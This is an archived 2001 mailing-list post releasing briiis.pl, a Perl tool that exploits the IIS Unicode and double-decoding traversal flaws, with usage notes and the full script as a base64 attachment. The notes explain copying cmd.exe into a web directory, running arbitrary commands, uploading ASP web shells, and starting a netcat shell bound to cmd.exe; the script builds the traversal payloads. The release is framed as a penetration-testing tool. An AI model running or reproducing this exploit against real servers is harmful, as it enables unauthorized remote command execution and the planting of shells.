[20998] in bugtraq
iXsecurity.tool.briiis.3.02
daemon@ATHENA.MIT.EDU (ian.vitek@ixsecurity.com)
Wed Jun 13 15:52:11 2001
From: ian.vitek@ixsecurity.com
To: pen-test@securityfocus.com
Cc: "Hackers" <Hackers@guardianit.se>
Message-ID: <41256A6A.004E3796.01@guardianit.se>
Date: Wed, 13 Jun 2001 15:14:18 +0100
Mime-Version: 1.0
Content-type: multipart/mixed;
Boundary="0__=GNSAeBmsD1dev2v62B1SlMHVwWcaBPqJhN6TbwW97P1fvKjfXI4UtpBR"
Content-Disposition: inline
--0__=GNSAeBmsD1dev2v62B1SlMHVwWcaBPqJhN6TbwW97P1fvKjfXI4UtpBR
Content-type: text/plain; charset=us-ascii
Content-Disposition: inline
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
iXsecurity Security Tool Release
briiis.pl v3.02
================
Tool Description
- - ------------
Briiis is a tool for testing web servers for "/" encoding
break out from web root vulnerability from an executable
directory.
E.g. IIS Unicode and double encoding vulnerabilities.
Special features
- - ------------
* Tests a lot of commonly executable directories if any
of these directories is on the same disk as
C:\WINNT\SYSTEM32\CMD.EXE
Very easy to add even more directories
* Caches the found directory
* SSL support with SSLeay (Unix)
* Easy to use text file upload
* Easy to use / encoding option
* Relative path name program execution
* Virtual host support
When to use briiis
- - --------------
Briiis should be used to test the IIS unicode or the IIS
superfluous decoding vulnerability. Briiis can also be
used to check for other "/" unicode or "/" decoding
vulnerabilities where the goal is to break out from the
web root from an executable directory to access CMD.EXE.
How to use briiis
- - -------------
Test a server for the unicode vulnerability with the
command:
briiis.pl -s server
Test the decoding vulnerability:
briiis.pl -s server -F %255c
Copy CMD.EXE to the web executable directory
(Used for running commands and uploading files)
briiis.pl -s server -x
Run commands
briiis.pl -s server -C "dir /a"
Upload an ASP script to the executable directory
(Like cmdasp.asp and upload.asp)
briiis.pl -s server -u upload.asp
Other options
- - ---------
The virtual host option, -H, is used when multiple web
servers are bound to same IP and PORT. One case is for
example reverse proxying.
The standard "-s www.server.dom" sets the "Host:" header to:
Host: www.server.dom
If other virtual servers needs to be tested run:
briiis.pl -s www.server.dom -H www.server2.dom
Briiis creates a cache file named "<program_name>.cache".
Delete the cache file if you want to run a new test after
patching the server.
The binary file upload does not work due to lack of
privileges. If you want to test it:
* Copy NC.EXE or something to NC.BIN
* briiis.pl -s server -U NC.BIN -d -l c:\
* There is now a NC.SCR, debug script, in c:\
* With cmdasp.asp run
debug < nc.scr
* Start NC.BIN with cmdasp.asp
c:\nc.bin -l -p 7171 -n -v -e cmd.exe
The binary upload function can only handle small files.
Use upload.asp or TFTP when uploading larger files.
Background and more information
- - ---------------------------
Unicode vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
Superfluous Decoding Vulnerability information:
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp
TODO
- -
* Graphical interface (Planned Q4 2002)
* Basic Authentication (Planned Q3 2001)
- - ------------------------------------------------
Ian Vitek, mailto:ian.vitek@ixsecurity.com
- - ------------------------------------------------
iXsecurity (former Infosec) is a Swedish and United
Kingdom based tigerteam that have worked with computer-
related security since 1982 and done technical security
audits (pentests) since 1995.
iXsecurity welcomes all new co-workers in Sweden
and United Kingdom.
- - ------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.1
iQA/AwUBOydnKY118uy6FU2iEQJttQCgvv2p/eLwoATBCHJwFGyglqTQg90An1jV
WnyLpKEcIdhaDfeNKALz2rNG
=FhpF
-----END PGP SIGNATURE-----
Briiis.pl
=========
(See attached file: briiis.pl)
--0__=GNSAeBmsD1dev2v62B1SlMHVwWcaBPqJhN6TbwW97P1fvKjfXI4UtpBR
Content-type: application/octet-stream;
name="briiis.pl"
Content-Disposition: attachment; filename="briiis.pl"
Content-transfer-encoding: base64
IyEvdXNyL2Jpbi9wZXJsICAgICAgICAgICAgICAgICAgICAKIyAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgIwojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMKIyBJSVMlIGZvdW5kIGJ5IGFub255
bW91cyAgICAgICAgICAgIwojIENyZWRzIHRvIFDkciDWc3Rlcm1hbiwgUkZQICAgICAgICAjCiMg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICMKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMjIyMjIyMjIyMjIwojICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjCiMg
Q29kZWQgYnkgaWFuLnZpdGVrQGl4c2VjdXJpdHkuY29tICMKICAkdmVyc2lvbj0iMy4wMiI7ICAg
ICAgICAgICAgICAgICAgIwojICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjCiMj
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKJHw9MTsKdXNlIFNvY2tldDsKcmVx
dWlyZSAnZ2V0b3B0cy5wbCc7CgojIEFkZCBJSVMgZGlyZWN0b3JpZXMgaGVyZQpAZGlycz0oICIv
bXNhZGMiLAogICAgICAgICIvX3Z0aV9iaW4iLAogICAgICAgICIvc2NyaXB0cyIsCiAgICAgICAg
Ii9fbWVtX2JpbiIsCiAgICAgICAgIi9TaXRlcyIsCiAgICAgICAgIi9TaXRlU2VydmVyIiwKICAg
ICAgICAiL192dGlfY25mIiwKICAgICAgICAiL192dGlfc2NyaXB0IiwKICAgICAgICAiL2Fkc2Ft
cGxlcyIsCiAgICAgICAgIi9paXNzYW1wbGVzIiwKICAgICAgICAiL2lpc2FkbXB3ZCIsCiAgICAg
ICAgIi9paXNoZWxwIiwKICAgICAgICAiL2FkdndvcmtzIiwKICAgICAgICAiL05ld3MiLAogICAg
ICAgICIvTWFpbCIsCiAgICAgICAgIi9jZ2ktYmluIiwKICAgICAgICAiL1BCU2VydmVyIiwKICAg
ICAgICAiL1JwYyIsCiAgICAgICAgIiIgKTsKCiRjYWNoZWQ9MDsKJGhpdD0wOwokcmV0cnk9MDsK
CiMgU2VuZHJhdyAtIHRoYW54IFJGUCByZnBAd2lyZXRyaXAubmV0CnN1YiBzZW5kcmF3IHsgICAj
IHRoaXMgc2F2ZXMgdGhlIHdob2xlIHRyYW5zYWN0aW9uIGFueXdheQogIG15ICgkcHN0cik9QF87
CiAgaWYgKCRvcHRfUykgewogICAgICAgIHNvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0
cHJvdG9ieW5hbWUoJ3RjcCcpfHwwKSB8fAogICAgICAgICAgICAgICAgZGllKCJTb2NrZXQgcHJv
YmxlbXNcbiIpOwoKICAgICAgICAjIGNvbm5lY3Qgc29ja2V0CiAgICAgICAgaWYoY29ubmVjdChT
LHNvY2thZGRyX2luKCRwb3J0LCR0YXJnZXQpKSkgewogICAgICAgICAgICBzZWxlY3QoUyk7ICAk
fD0xOwoKICAgICAgICAgICAgJGN0eCA9IE5ldDo6U1NMZWF5OjpDVFhfbmV3KCkgb3IgZGllKCJG
YWlsZWQgdG8gY3JlYXRlIFNTTF9DVFhcbiQhXG4iKTsKICAgICAgICAgICAgJHNzbCA9IE5ldDo6
U1NMZWF5OjpuZXcoJGN0eCkgb3IgZGllKCJGYWlsZWQgdG8gY3JlYXRlIFNTTFxuJCFcbiIpOwog
ICAgICAgICAgICBOZXQ6OlNTTGVheTo6c2V0X2ZkKCRzc2wsIGZpbGVubyhTKSk7ICAgIyBNdXN0
IHVzZSBmaWxlbm8KICAgICAgICAgICAgJHJlcyA9IE5ldDo6U1NMZWF5Ojpjb25uZWN0KCRzc2wp
IG9yIGRpZSgiRmFpbGVkIHRvIGhhbmRzaGFrZSBTU0xcbiQhXG4iKTsKICAgICAgICAgICAgJHJl
cyA9IE5ldDo6U1NMZWF5Ojp3cml0ZSgkc3NsLCAkcHN0cik7CiAgICAgICAgICAgIG15IEBpbjsK
ICAgICAgICAgICAgJHJkYXRhID0gIiI7CiAgICAgICAgICAgIHdoaWxlKCRyZGF0YSA9IE5ldDo6
U1NMZWF5OjpyZWFkKCRzc2wpKSB7IHB1c2ggQGluLCAkcmRhdGE7IH0KICAgICAgICAgICAgIyBj
bG9zZSBkb3duIHNvY2tldAogICAgICAgICAgICBOZXQ6OlNTTGVheTo6ZnJlZSAoJHNzbCk7ICAg
ICAgICAgICAgICAgIyBUZWFyIGRvd24gY29ubmVjdGlvbgogICAgICAgICAgICBOZXQ6OlNTTGVh
eTo6Q1RYX2ZyZWUgKCRjdHgpOwogICAgICAgICAgICBzZWxlY3QoU1RET1VUKTsgY2xvc2UoUyk7
CiAgICAgICAgICAgIHByaW50IEBpbiBpZigkb3B0X2QpOwogICAgICAgICAgICByZXR1cm4gQGlu
OwogICAgICAgIH0gZWxzZSB7IGRpZSgiQ2FuJ3QgY29ubmVjdC4uLlxuIik7IH0KICB9IGVsc2Ug
ewogICAgICAgIHNvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpfHwwKSB8fAogICAgICAgICAgICAgICAgZGllKCJTb2NrZXQgcHJvYmxlbXNcbiIpOwogICAg
ICAgIGlmKGNvbm5lY3QoUyxwYWNrICJTbkE0eDgiLDIsJHBvcnQsJHRhcmdldCkpewogICAgICAg
ICAgICAgICAgbXkgQGluOwogICAgICAgICAgICAgICAgc2VsZWN0KFMpOwogICAgICAgICAgICAg
ICAgJHw9MTsKICAgICAgICAgICAgICAgIHByaW50ICRwc3RyOwogICAgICAgICAgICAgICAgd2hp
bGUoPFM+KXsgcHVzaCBAaW4sICRfO30KICAgICAgICAgICAgICAgIHNlbGVjdChTVERPVVQpOwog
ICAgICAgICAgICAgICAgY2xvc2UoUyk7CiAgICAgICAgICAgICAgICByZXR1cm4gQGluOwogICAg
ICAgIH0gZWxzZSB7IGRpZSgiQ2FuJ3QgY29ubmVjdC4uLlxuIik7IH0KICB9Cn0KCiMgQ2hlY2sg
aWYgY2FjaGVkCnN1YiBjaGVja2NhY2hlIHsKICAkaXA9JF9bMF07CiAgJGR0bXAxPSIiOwogIG9w
ZW4oQ0FDSEUsIiQwLmNhY2hlIik7CiAgd2hpbGUoPENBQ0hFPikgewogICAgY2hvbXA7CiAgICAo
JGlwLCRkdG1wMik9L14oXFMrKVxzKyhcLy4rKSQvOwogICAgaWYoICRpcCBlcSAkb3B0X3MpIHsK
ICAgICAgJGR0bXAxPSRkdG1wMjsKICAgICAgbGFzdDsKICAgIH0KICB9CiAgY2xvc2UoQ0FDSEUp
OwogIHJldHVybigkZHRtcDEpOwp9CgpzdWIgdGVzdGRpcnMgewogICAgJGV4cGw9JF9bMF07CiAg
ICBmb3JlYWNoICR0cnlEaXIgKEBkaXJzKSB7CiAgICAgICMgRm9ybSByZXF1ZXN0CiAgICAgIEBy
ZXM9c2VuZHJhdygiR0VUICR0cnlEaXIkZXhwbCBIVFRQLzEuMFxuJGh0dHBob3N0XG4iKTsKICAg
ICAgIyBTbywgd2hhdCBkaWQgd2UgZ2V0PwogICAgICAkc3RhdHVzPXNoaWZ0IEByZXM7CiAgICAg
IGlmKCRzdGF0dXMgIX4gL15IVFRQXFMrXHMoNHw1MFteMl0pL2kpIHsKICAgICAgICBkaWUgIkht
bS4uLiBObyBkYXRhLiBNYXliZSByZXZlcnNlIHByb3h5LiBUcnkgLUhcbiIgaWYoJHN0YXR1cyAh
fiAvXHcrLyAmJiAkcmVzWzFdICF+IC9cdysvKTsKICAgICAgICBvcGVuKENBQ0hFLCI+PiQwLmNh
Y2hlIik7CiAgICAgICAgcHJpbnQgQ0FDSEUgIiRvcHRfcyAkdHJ5RGlyXG4iOwogICAgICAgIGNs
b3NlKENBQ0hFKTsKICAgICAgICBwcmludCAiXG5odHRwOi8vJHRhcmdldCR0cnlEaXJcbiIgaWYo
JG9wdF92KTsKICAgICAgICBwcmludCAiXG5AcmVzXG4iIGlmKCEkb3B0X3gpOwogICAgICAgICRo
aXQ9MTsKICAgICAgICBsYXN0OwogICAgICB9IGVsc2UgewogICAgICAgIHByaW50ICIuIiBpZigh
JG9wdF92ICYmICEkb3B0X2QpOwogICAgICAgIHByaW50ICIkc3RhdHVzXG4iIGlmKCRvcHRfdik7
CiAgICAgICAgcHJpbnQgIiRzdGF0dXNcbkByZXNcbiIgaWYoJG9wdF9kKTsKICAgICAgfQogICAg
IyBSZXNldCByZXJ0eSBjb3VudCBhbmQgdHJ5IG5leHQgZGlyZWN0b3J5CiAgICAkcmV0cnk9MDsK
ICAgIH0KICAgIGRpZSAiIE5vIHdlYiBkaXJlY3RvcmllcyBmb3VuZCBvbiBzeXN0ZW0gZGlza1xu
IiBpZighICRoaXQpOwp9CgpzdWIga25vd2RpciB7CiAgICAkZXhwbD0kX1swXTsKICAgIEByZXM9
c2VuZHJhdygiR0VUICRjYWNoZWRpciRleHBsIEhUVFAvMS4wXG4kaHR0cGhvc3RcbiIpOwogICAg
JHN0YXR1cz1zaGlmdCBAcmVzOwogICAgcHJpbnQgIiRzdGF0dXNcbiIgaWYoJG9wdF92KTsKICAg
IHByaW50ICJAcmVzXG4iOwp9CgpzdWIgbmtub3dkaXIgewogICAgJGV4cGw9JF9bMF07CiAgICBA
cmVzPXNlbmRyYXcoIkdFVCAkY2FjaGVkaXIkZXhwbCBIVFRQLzEuMFxuJGh0dHBob3N0XG4iKTsK
ICAgICRzdGF0dXM9c2hpZnQgQHJlczsKICAgIHByaW50ICIkc3RhdHVzXG4iIGlmKCRvcHRfdik7
CiAgICBwcmludCAiLiIgaWYoISRvcHRfdik7Cn0KCkdldG9wdHMoJ3M6aGM6Qzp2ZHA6U3hYOnU6
VTpmOkY6bDpyOkg6Jyk7CmRpZSAiXG5UZXN0IElJUyAnJWMwJWFmJyB2dWxuLiBWZXJzaW9uICR2
ZXJzaW9uIGJ5IElhbiBWaXRlayBpYW4udml0ZWtcQGl4c2VjdXJpdHkuY29tXAoqIGlYc2VjdXJp
dHkgKGZvcm1lcmx5IEluZm9zZWMpIGlzIGhpcmluZyBpbiBTd2VkZW4gYW5kIFVuaXRlZCBLaW5n
ZG9tICAgKlwKKiBNYWlsIHRvOiBjaHJpc3Rlci5zdGFmZmVyb2RcQGl4c2VjdXJpdHkuY29tLiAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAqXApcCnVzYWdlOiAkMCAtcyA8aG9zdD4gW29wdGlv
bnNdIFstYyB8fCAtQyB8fCAteF1cClx0LXMgPGhvc3Q+ICAgICBIb3N0IHdpdGggSUlTIDQuMCBv
ciA1LjBcClx0LWMgPGNvbW1hbmQ+ICBcXHdpbm50XFxzeXN0ZW0zMlxcY21kLmV4ZT8vYys8Y29t
bWFuZD5cClx0ICAgICAgICAgICAgICAoZGVmOiBcImRpciBjOlxcIC9hXCIpXApcdC1DIDxjb21t
YW5kPiAgXCRWVUxORElSL2kuZXhlPy9jKzxjb21tYW5kPlwKXHQtcCA8cG9ydD4gICAgIFBvcnQg
KERlZjogODApXApcdC1TICAgICAgICAgICAgU1NMIG1vZGVcClx0LWYgPHZ1bG5kaXI+ICBGb3Jj
ZSBcJFZVTE5ESVIgdG8gPHZ1bG5kaXI+XApcdCAgICAgICAgICAgICAgKElmIHlvdSB3YW5uYSBy
dW4gKC1yKSB0aGluZ3MgZnJvbSB3ZWIgZGlzaylcClx0LUYgPFVuaWNvZGU+ICBcIi9cIiBpbiB1
bmljb2RlIChEZWY6ICVjMCVhZilcClx0ICAgICAgICAgICAgICAoVHJ5IHVuaWNvZGUgJTI1NWMg
aWYgZGVmYXVsdCBmYWlscylcClx0LUggPGhvc3Q+ICAgICBTZW5kIEhvc3Q6IGhvc3RcClx0ICAg
ICAgICAgICAgICAoVXNlZCB3aGVuIHNldmVyYWwgaG9zdHMgYXJlIG9uIHNhbWUgSVA6UE9SVClc
Clx0LXYgICAgICAgICAgICBWZXJib3NlXApcdC1kICAgICAgICAgICAgRGVidWdcClx0LXggICAg
ICAgICAgICBlWHBsb2l0IGhvc3QgYnkgY29weWluZyBjbWQuZXhlIHRvIFwkVlVMTkRJUi9pLmV4
ZVwKXHQtWCA8YmF0Y2g+ICAgIFJ1biBjb21tYW5kcyBpbiBiYXRjaCBmaWxlIHdpdGggXCRWVUxO
RElSL2kuZXhlPy9jXApcdC11IDx0ZXh0ZmlsZT4gVXBsb2FkIDx0ZXh0ZmlsZT4gd2l0aCBcJFZV
TE5ESVIvaS5leGU/L2NcClx0ICAgICAgICAgICAgICAoV29ya2VzIGZpbmUgd2l0aCBTU0kgcGFn
ZXMpXApcdC1VIDxiaW5maWxlPiAgVXBsb2FkIDxiaW5maWxlPiB3aXRoIFwkVlVMTkRJUi9pLmV4
ZT8vYyBhbmQgREVCVUcuRVhFXApcdCAgICAgICAgICAgICAgPGJpbmZpbGU+IG1heSBub3QgY29u
dGFpbiBcXHgxQVwKXHQgICAgICAgICAgICAgIChDb3BpZXMgREVCVUcuRVhFIHRvIFwkVlVMTkRJ
Ui9kLmV4ZSlcClx0ICAgICAgICAgICAgICAoTm90IGZ1bGx5IGltcGxlbWVudGVkISBEbyBub3Qg
dXNlISlcClx0LXIgPGV4ZT4gICAgICBSdW4gY29tbWFuZCAoZnVsbCBwYXRoIHdpdGggXCIvXCIg
YW5kIGV4ZSlcClx0ICAgICAgICAgICAgICAoZXhlIG5lZWQgdG8gYmUgb24gXCRWVUxORElSIGRp
c2spXApcdC1sIDxsb2NhdGlvbj4gRGlyZWN0b3J5IGZvciB1cGxvYWRlZCBmaWxlXApcdCAgICAg
ICAgICAgICAgKFVzYWdlOiAtbCBkaXJcXCBvciAtbCBcImRpclxcXFxcIilcClx0LWggICAgICAg
ICAgICBUaGlzIGhlbHBcblxuIiBpZiAoICRvcHRfaCB8fCAhICRvcHRfcyB8fCAoJG9wdF9jICYm
ICRvcHRfQykgKTsKCiRvcHRfRj0iJWMwJWFmIiBpZighJG9wdF9GKTsKJG9wdF9jPSJkaXIgYzpc
XCAvYSIgaWYoISRvcHRfYyAmJiAhJG9wdF9DKTsKJGV4cGxzdHI9Ii8uLiRvcHRfRi4uJG9wdF9G
Li4kb3B0X0YuLiRvcHRfRi4uJHtvcHRfRn13aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jKyRvcHRf
YyIgaWYgKCRvcHRfYyk7CiRleHBsc3RyPSIvaS5leGU/L2MrJG9wdF9DIiBpZigkb3B0X0MpOwok
ZXhwbHN0cj0iLy4uJG9wdF9GLi4kb3B0X0YuLiRvcHRfRi4uJG9wdF9GLi4ke29wdF9GfXdpbm50
L3N5c3RlbTMyL2NtZC5leGU/L2MrY29weStcXHdpbm50XFxzeXN0ZW0zMlxcY21kLmV4ZStpLmV4
ZSIgaWYgKCRvcHRfeCk7CiRleHBsc3RyPX5zLyAvKy9nOwokb3B0X2wuPSJcXCIgaWYoJG9wdF9s
IX4vXFwkLyAmJiAkb3B0X2wpOwokb3B0X3A9NDQzIGlmKCEkb3B0X3AgJiYgJG9wdF9TKTsKJG9w
dF9wPTgwIGlmKCEkb3B0X3ApOwokcG9ydD0kb3B0X3A7CiR0YXJnZXQ9aW5ldF9hdG9uKCRvcHRf
cyk7CiRodHRwaG9zdD0iSG9zdDogJG9wdF9IXG4iIGlmKCRvcHRfSCk7CiRodHRwaG9zdD0iSG9z
dDogJG9wdF9zXG4iIGlmKCEkaHR0cGhvc3QpOwppZigkb3B0X1MpIHsKICByZXF1aXJlIE5ldDo6
U1NMZWF5OwogIE5ldDo6U1NMZWF5Ojpsb2FkX2Vycm9yX3N0cmluZ3MoKTsKICBOZXQ6OlNTTGVh
eTo6U1NMZWF5X2FkZF9zc2xfYWxnb3JpdGhtcygpOwogIE5ldDo6U1NMZWF5OjpyYW5kb21pemUo
KTsKfQoKaWYoISRvcHRfZikgewogICRjYWNoZWRpcj0mY2hlY2tjYWNoZSgkdGFyZ2V0KTsKfSBl
bHNlIHsKICAkY2FjaGVkaXI9JG9wdF9mOwp9CgppZighICgkb3B0X1ggfHwgJG9wdF91IHx8ICRv
cHRfVSB8fCAkb3B0X3IpKSB7CiAgaWYoISRjYWNoZWRpcikgewogICAgJnRlc3RkaXJzKCRleHBs
c3RyKTsKICB9IGVsc2UgewogICAgJmtub3dkaXIoJGV4cGxzdHIpOwogIH0KfQoKaWYoJG9wdF9y
KSB7CiAgJG9wdF9yPX5zLyAvPy87CiAgJGV4cGxzdHI9Ii8uLiRvcHRfRi4uJG9wdF9GLi4kb3B0
X0YuLiRvcHRfRi4uJG9wdF9yIjsKICAkZXhwbHN0cj1+cy8gLysvZzsKICAma25vd2RpcigkZXhw
bHN0cik7Cn0KCgppZigkb3B0X1gpIHsKICBkaWUgIk5lZWQgdG8gaGF2ZSBcJFZVTE5ESVIgaW4g
Y2FjaGUuXG5SdW4gXCIkMCAtcyAkb3B0X3MgLXhcIiBmaXJzdC5cbiIgaWYoISRjYWNoZWRpcik7
CiAgQGNvbW1hbmRzPSIiOwogIG9wZW4oQkFUQ0gsIiRvcHRfWCIpIG9yIGRpZSAiQ2FuXCd0IG9w
ZW4gYmF0Y2ggZmlsZSBcIiRvcHRfWFwiXG4kIVxuIjsKICB3aGlsZSg8QkFUQ0g+KSB7CiAgICBj
aG9tcDsKICAgIHB1c2goQGNvbW1hbmRzLCRfKTsKICB9CiAgY2xvc2UoQkFUQ0gpOwogIGZvcmVh
Y2ggJGNvbW1hbmQgKEBjb21tYW5kcykgewogICAgJGV4cGxzdHI9Ii9pLmV4ZT8vYyskY29tbWFu
ZCI7CiAgICAkZXhwbHN0cj1+cy8gLysvZzsKICAgICZrbm93ZGlyKCRleHBsc3RyKTsKICB9ICAK
fQoKaWYoJG9wdF91KSB7CiAgZGllICJOZWVkIHRvIGhhdmUgXCRWVUxORElSIGluIGNhY2hlLlxu
UnVuIFwiJDAgLXMgJG9wdF9zIC14XCIgZmlyc3QuXG4iIGlmKCEkY2FjaGVkaXIpOwogIG9wZW4o
VUZJTEUsIiRvcHRfdSIpIG9yIGRpZSAiQ2FuXCd0IG9wZW4gdXBsb2FkIGZpbGUgXCIkb3B0X3Vc
IlxuJCFcbiI7CiAgJGV4cGxzdHI9Ii9pLmV4ZT8vYytkZWwrJG9wdF9sJG9wdF91IjsKICAkZXhw
bHN0cj1+cy8gLysvZzsKICBwcmludCAiUm93cyB1cGxvYWRlZDogICAgICI7CiAgJm5rbm93ZGly
KCRleHBsc3RyKTsKICAkcm93cz0wOwogIHdoaWxlKCRsaW5lPTxVRklMRT4pIHsKICBjaG9tcCAk
bGluZTsKICAkZXNjYXBlPTA7CiAgJGVsaW5lPSIiOwogICRsaW5lPX5zOiguKToKICAgICRjaGFy
PSQxOwogICAgJGVzY2FwZV49MSBpZigkY2hhciBlcSAiXCIiKTsKICAgIGlmKCRjaGFyPX4vWzx8
PiZdLyAmJiAhICRlc2NhcGUpIHsKICAgICAgJGVsaW5lLj0iXiRjaGFyIjsKICAgIH0gZWxzZSB7
CiAgICAgICRlbGluZS49IiRjaGFyIjsKICAgIH0KICA6Z2U7CgogICRlbGluZT1+cy9cJS9cJTI1
L2c7CiAgJGVsaW5lPX5zLyYvXCUyNi9nOwogICRlbGluZT1+cy9cKy9cJTJiL2c7CiAgJGVsaW5l
PX5zLz0vXCUzZC9nOwogICRlbGluZT1+cy9jbWQuZXhlL2NtZC9nOwoKICAkZWxpbmUuPSIgIiBp
ZigkZWxpbmU9fi9cc1xkJC8pOwogIGlmKCRlbGluZT1+L15ccyokLykgewogICAgJGV4cGxzdHI9
Ii9pLmV4ZT8vYytlY2hvLis+PiRvcHRfbCRvcHRfdSI7CiAgfSBlbHNlIHsKICAgICRleHBsc3Ry
PSIvaS5leGU/L2MrZWNobyskZWxpbmU+PiRvcHRfbCRvcHRfdSI7CiAgfQogICRleHBsc3RyPX5z
LyAvKy9nOwogICAgJm5rbm93ZGlyKCRleHBsc3RyKTsKICAgICRyb3dzKys7CiAgICBwcmludGYo
IlxiXGJcYlxiXGJcYiUtNWQiLCRyb3dzKTsKICB9CiAgcHJpbnQgImRvbmVcbiI7Cn0gIAoKaWYo
JG9wdF9VKSB7CiAgZGllICJOZWVkIHRvIGhhdmUgXCRWVUxORElSIGluIGNhY2hlLlxuUnVuIFwi
JDAgLXMgJG9wdF9zIC14XCIgZmlyc3QuXG4iIGlmKCEkY2FjaGVkaXIpOwogIG9wZW4oVUZJTEUs
IiRvcHRfVSIpIG9yIGRpZSAiQ2FuXCd0IG9wZW4gdXBsb2FkIGZpbGUgXCIkb3B0X1VcIlxuJCFc
biI7CiAgCiAgcHJpbnQgIlVudGVzdGVkIGNvZGUuIENhbiB5b3UgcnVuIERFQlVHLkVYRSBmcm9t
IFwkVlVMTkRJUj9cbiI7CiAgcHJpbnQgIlByb2JhYmx5IG5vdC4uLiBQbGVhc2UgdXNlIC12IHRv
IGNoZWNrLiBXZWxsLCBoZXJlIHdlIGdvOlxuIjsKICBwcmludCAiSW5pdCI7CgogICMgV2hlcmUg
Y2FuIHlvdSBydW4gZC5leGU/CiAgJGV4cGxzdHI9Ii8uLiRvcHRfRi4uJG9wdF9GLi4kb3B0X0Yu
LiRvcHRfRi4uJHtvcHRfRn13aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2NvcHkrXFx3aW5udFxc
c3lzdGVtMzJcXGRlYnVnLmV4ZStkLmV4ZSI7CiAgJGV4cGxzdHI9fnMvIC8rL2c7CiAgJm5rbm93
ZGlyKCRleHBsc3RyKTsKCiAgcHJpbnQgInVwbG9hZGluZyBkZWJ1ZyBzY3IgZmlsZSAoQnl0ZXMp
OiI7CiAgJG9wdF9VPX4vXihbXlwuXSspLzsKICAkdG1wZmlsZT0kMSAuICIuc2NyIjsKICAkZXhw
bHN0cj0iL2kuZXhlPy9jK2VjaG8rbiskb3B0X2wkb3B0X1U+JG9wdF9sJHRtcGZpbGUiOwogICRl
eHBsc3RyPX5zLyAvKy9nOwogICZua25vd2RpcigkZXhwbHN0cik7CgogICRleHBsc3RyPSIvaS5l
eGU/L2MrZWNobythPj4kb3B0X2wkdG1wZmlsZSI7CiAgJGV4cGxzdHI9fnMvIC8rL2c7CiAgJm5r
bm93ZGlyKCRleHBsc3RyKTsKCiAgJG49MDsKICBwcmludCAiICAgICAgICAiOwogIGJpbm1vZGUo
VUZJTEUpOwogIHdoaWxlKCAkdG49cmVhZChVRklMRSwkaW5kYXRhLDE2KSApIHsKICAgICRpbmRh
dGE9fnMvKC4pL3NwcmludGYoIiUwMngsIixvcmQgJDEpL3NlZzsKICAgIGNob3AoJGluZGF0YSk7
CiAgICAkZXhwbHN0cj0iL2kuZXhlPy9jK2VjaG8rZGIrJGluZGF0YT4+JG9wdF9sJHRtcGZpbGUi
OwogICAgJGV4cGxzdHI9fnMvIC8rL2c7CiAgICAkbis9JHRuOwogICAgJm5rbm93ZGlyKCRleHBs
c3RyKTsKICAgIHByaW50ZigiXGJcYlxiXGJcYlxiXGJcYlxiXGJcYiAlLTlkIiwkbik7CiAgfQoK
ICAkZXhwbHN0cj0iL2kuZXhlPy9jK2VjaG8rXHgwMz4+JG9wdF9sJHRtcGZpbGUiOwogICRleHBs
c3RyPX5zLyAvKy9nOwogICZua25vd2RpcigkZXhwbHN0cik7CgogICRleHBsc3RyPSIvaS5leGU/
L2MrZWNobytyY3g+PiRvcHRfbCR0bXBmaWxlIjsKICAkZXhwbHN0cj1+cy8gLysvZzsKICAmbmtu
b3dkaXIoJGV4cGxzdHIpOwogIAogICRobj1zcHJpbnRmKCIlMDJ4Iiwkbik7CiAgJGV4cGxzdHI9
Ii9pLmV4ZT8vYytlY2hvKyRobj4+JG9wdF9sJHRtcGZpbGUiOwogICRleHBsc3RyPX5zLyAvKy9n
OwogICZua25vd2RpcigkZXhwbHN0cik7CgogICRleHBsc3RyPSIvaS5leGU/L2MrZWNobyt3Pj4k
b3B0X2wkdG1wZmlsZSI7CiAgJGV4cGxzdHI9fnMvIC8rL2c7CiAgJm5rbm93ZGlyKCRleHBsc3Ry
KTsKCiAgJGV4cGxzdHI9Ii9pLmV4ZT8vYytlY2hvK3E+PiRvcHRfbCR0bXBmaWxlIjsKICAkZXhw
bHN0cj1+cy8gLysvZzsKICAmbmtub3dkaXIoJGV4cGxzdHIpOwoKICBwcmludCAiXGJcYlxiXGJc
YiBkb25lLiBUcnlpbmcgdG8gcnVuIGQuZXhlXG4iOwogICRleHBsc3RyPSIvZC5leGU/PCRvcHRf
bCR0bXBmaWxlIjsKICAkZXhwbHN0cj1+cy8gLysvZzsKICAmbmtub3dkaXIoJGV4cGxzdHIpOwoK
ICBpZighICRvcHRfZCkgewogICAgcHJpbnQgIlxiQ2xlYW5pbmciOwogICAgJGV4cGxzdHI9Ii9p
LmV4ZT8vYytkZWwrJG9wdF9sJHRtcGZpbGUiOwogICAgJGV4cGxzdHI9fnMvIC8rL2c7CiAgICAm
bmtub3dkaXIoJGV4cGxzdHIpOwogICAgcHJpbnQgIlxuIjsKICB9IGVsc2UgewogICAgcHJpbnQg
IlxiJHRtcGZpbGUgbGVmdCBmb3IgZGVidWdpbmdcbiI7CiAgfQp9ICAK
--0__=GNSAeBmsD1dev2v62B1SlMHVwWcaBPqJhN6TbwW97P1fvKjfXI4UtpBR--
